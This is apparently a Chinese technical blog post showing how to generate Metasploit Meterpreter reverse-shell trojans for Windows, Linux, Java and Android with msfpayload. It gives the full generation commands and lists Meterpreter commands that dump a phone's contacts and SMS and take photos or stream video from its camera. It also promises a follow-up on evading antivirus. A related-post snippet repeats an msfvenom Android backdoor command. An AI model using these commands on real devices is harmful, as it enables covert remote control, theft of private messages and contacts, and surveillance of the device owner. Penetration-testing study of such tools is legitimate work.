Msfpayload多平台木马实战

最新推荐文章于 2024-02-29 16:28:30 发布
最新推荐文章于 2024-02-29 16:28:30 发布
阅读量5.4k 收藏 12
点赞数 1
分类专栏: 渗透相关 文章标签: 木马 渗透测试 msfencode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sufeiboy/article/details/65939267
版权

前言:

msfpayload不仅可以生成windows系统的木马文件,还可以生成LinuxJavaAndroid等环境下的木马,原理是注入一个攻击载荷(Payload),目标一旦打开,就会执行Payload,然后根据Payload的特性执行相关操作,这里我用反连的载荷reverse_tcp.

 

Windows系统下:

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=port X > test.exe

 

1-1.

 

1-2.

 

Linux系统下:

msfpayload linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=port X > test

 

1-3.

 

1-4.

ls -l 列出文件以及文件的详细信息;./代表执行一个文件;chmod 777 linux_backdoor表示设置linux_backdoor的权限为最高.

 

1-5.

 

Java环境下:

msfpayload java/meterpreter/reverse_tcp LHOST=IP LPORT=port X > test.jar

 

1-6.

 

1-7.

 

Android环境下:

msfpayload android/meterpreter/reverse_tcp LHOST=IP LPORT=port X > android_backdoor.apk

 

1-8.

 

1-9.

dump_contacts     //导出电话

dump_sms        //导出信息

Webcam_list      //可以看到摄像头数量

-i 1             //选择后摄像头

webcam_snap     //拍照

webcam_stream  //开启摄像头

 

 

后语:

这些木马程序没有经过免杀,只要用户装了杀毒软件,秒秒钟被杀,如果想让木马免杀,请关注我的下一篇文章。

最后感谢Cracer,我是一直看他的视频,文档资料学习渗透测试的,对于这些难得的免费资料,难得的分享精神和高质量的技术干货,着实让人敬畏,想要提高自己技术的朋友可以到他的网站看一下:http://cracer.com/

因为有了无数像Cracer这类人走在前面,我们才能站在巨人的肩膀上,学得更深,看得更远!

summe_blue
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
VC++多线程原虫IPC种植木马
09-07
VC++以多线程的方式实现IPC远程木马种植,经典的IPC,同时也是VC++首先的,VC++爱好者们,果断学习。
手工实战Rootkit木马.pdf
05-19
对象:普通大众用户 目的:解决大家在日常清除恶意程序时遇到的典型困难之一:恶意程序运行rootkit技术使用户无法打开一些比较主要的修复工具(非映像劫持技术, 且此技术对Wsycheck无效),也无法从普通的工具上看到系统运行的异常。一方面,希望此教程有肋于普通用户对Rootkit木马的了解,另[71.40]一 方面,也希望加强普通用户的动手能力和对修复工具的使用熟悉程度。所以在我们卡饭论坛的样本区里,选了一个比较合适的样本,做清除修复的典 型实例,以供大家参考,那么,下面我们就开始吧! 源于:卡饭安全论坛
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
最新发布
dzqxwzoe的博客
02-29 539
l, --list 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format 指定输出格式-e, --encoder 指定需要使用的encode,指定需要使用的编码。
多媒体木马过滤器,安全过滤多媒体
06-13
多媒体木马过滤器,安全过滤多媒体,可以安全过滤掉下载回来的多媒体文件中的木马
网页木马攻防实战.rar
11-29
介绍网页木马发展的历史、网页木马剖析、调试器与脚本语言、缓冲区溢出的概念、shellcode的编写、网马免杀方法、网马实例编写与分析、网页木马的防范等内容。
电影等多媒体木马过滤器
03-18
用于对网上下载下来的电影,图片,mp3等多媒体木马过滤 非常好用,这样就不用担心看电影也使得电脑中病毒了!
生成msf常用payload
hl1293348082的专栏
04-07 2497
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成的payload列表: msfvenom -l 正在上传…重新上传取消 生成二进制文件 关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。 Windows ms
MSF实战-利用0day双杀java环境-宏感染-安卓客户端进行渗透
L120305q的博客
03-31 627
MSF实战笔记
【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 6223
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块)
【学习笔记】msf-java木马源码分析
rm -rf *
01-31 757
metasploit-java木马-源码学习
msf生成payload并注入到可执行程序exe中
redwand的博客
07-22 4718
msfconsole下的generate与msfvomen命令实际是不同环境下的同一个命令,其功能基本相同,这里我们要学习的重点是使用-k -x 选项将payload注入到可以执行文件exe中,这项技能在实战中后渗透测试的可持久化中经常会被用到。
多线程扫描网页木马
08-09
多线程技术。 遍历文件,然后判断其特殊的文件状态,然后根据此判断出来是网页木马,列出来,然后允许删除。
木马与病毒
03-26
今时今日,一直都有不少的人以为木马和病毒没什么区别,只要安装了杀毒软件,那么就万事无忧了。其实,木马并不等同于病毒,杀毒软件未必就能将隐藏的木马抓出来。下面,我们先来了解下木马与病毒的定义。
木马程序的制作
热门推荐
自学编程_youkewang.top
03-08 3万+
0x0:想必大家都听说过计算机病毒或者木马吧,看着电影里面的黑客敲几下键盘就能控制你的系统,窃取你的隐私资料,执行任意命令,很炫酷吧,其实这种技术不难实现,接下来我就带领大家来玩一玩木马的制作. 实验环境:一台Win7SP1和一台WinXPsp3+Backtrack5. 使用工具有:msfpayload+msfencode.   0x01:使用msfpayload windows/mete
解决Kali“没有Release文件”,“下列签名无效”等问题
自学编程_youkewang.top
02-15 1万+
今天想在kali上测试点东西,打开了几个星期没用的物理机上的Kali,准备apt-get update更新下系统,结果报错了,提示“仓库没有Release文件”,参见apt-secure(8)手册以及了解仓库创建和用户配置方面的细节;下列签名无效等等等。为什么我不上图,原因是我以及修复好了,所以难以还原报错信息。查了很多资料,解决方法如下:原因:Kali Linux由于太长时间未更新,密钥过期了,...
Fluxion
自学编程_youkewang.top
09-05 1万+
破解WiFi密码,除了Aircrack-ng的暴力跑字典外,还有一种新“姿势”,就是WiFi钓鱼,利用Fluxion可以很简单的实现。 首先下载fluxion:https://github.com/MuhammadOmar125/fluxion 下载之后解压运行,保证源正确的情况下使用apt-get install 命令安装所需要的服务。 图1-1. 图1-2.
使用Armitage进行渗透测试与键盘记录
自学编程_youkewang.top
02-20 1万+
0x00:Armitage是一款基于GUI开发的图形化渗透工具,对于渗透测试而言能够快速了解网络的拓扑以及主机状态,其功能丰富,是每一位渗透测试者的必备武器;今天我就来演示如何在Armitage下入侵纯在漏洞的XP系统,废话不多说了,Let’s  go!   0x01:打开Armitage的方法很简单,直接在终端中输入Armitage或者直接点击做点的图标,然后点击是就可以进入界面了.
shellter免杀技术实战
自学编程_youkewang.top
03-25 1万+
Shellter是一个开源的免杀工具,利用动态Shellcode注入来实现免杀的效果,想了解更多可以参考shellter官网:https://www.shellterproject.com/   实验环境:kali  shellter_v6.9  360  putty.exe   图1-1.   Part1:首先使用unzip解压shellter_v6.9到当前目录,然后进入shell
msf生成捆绑安卓木马
05-27
在Metasploit中,可以使用以下步骤生成捆绑安卓木马: 1. 打开Metasploit控制台并输入以下命令启动msfvenom: ``` msfvenom -p android/meterpreter/reverse_tcp LHOST=<your IP address> LPORT=<your port> R > ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值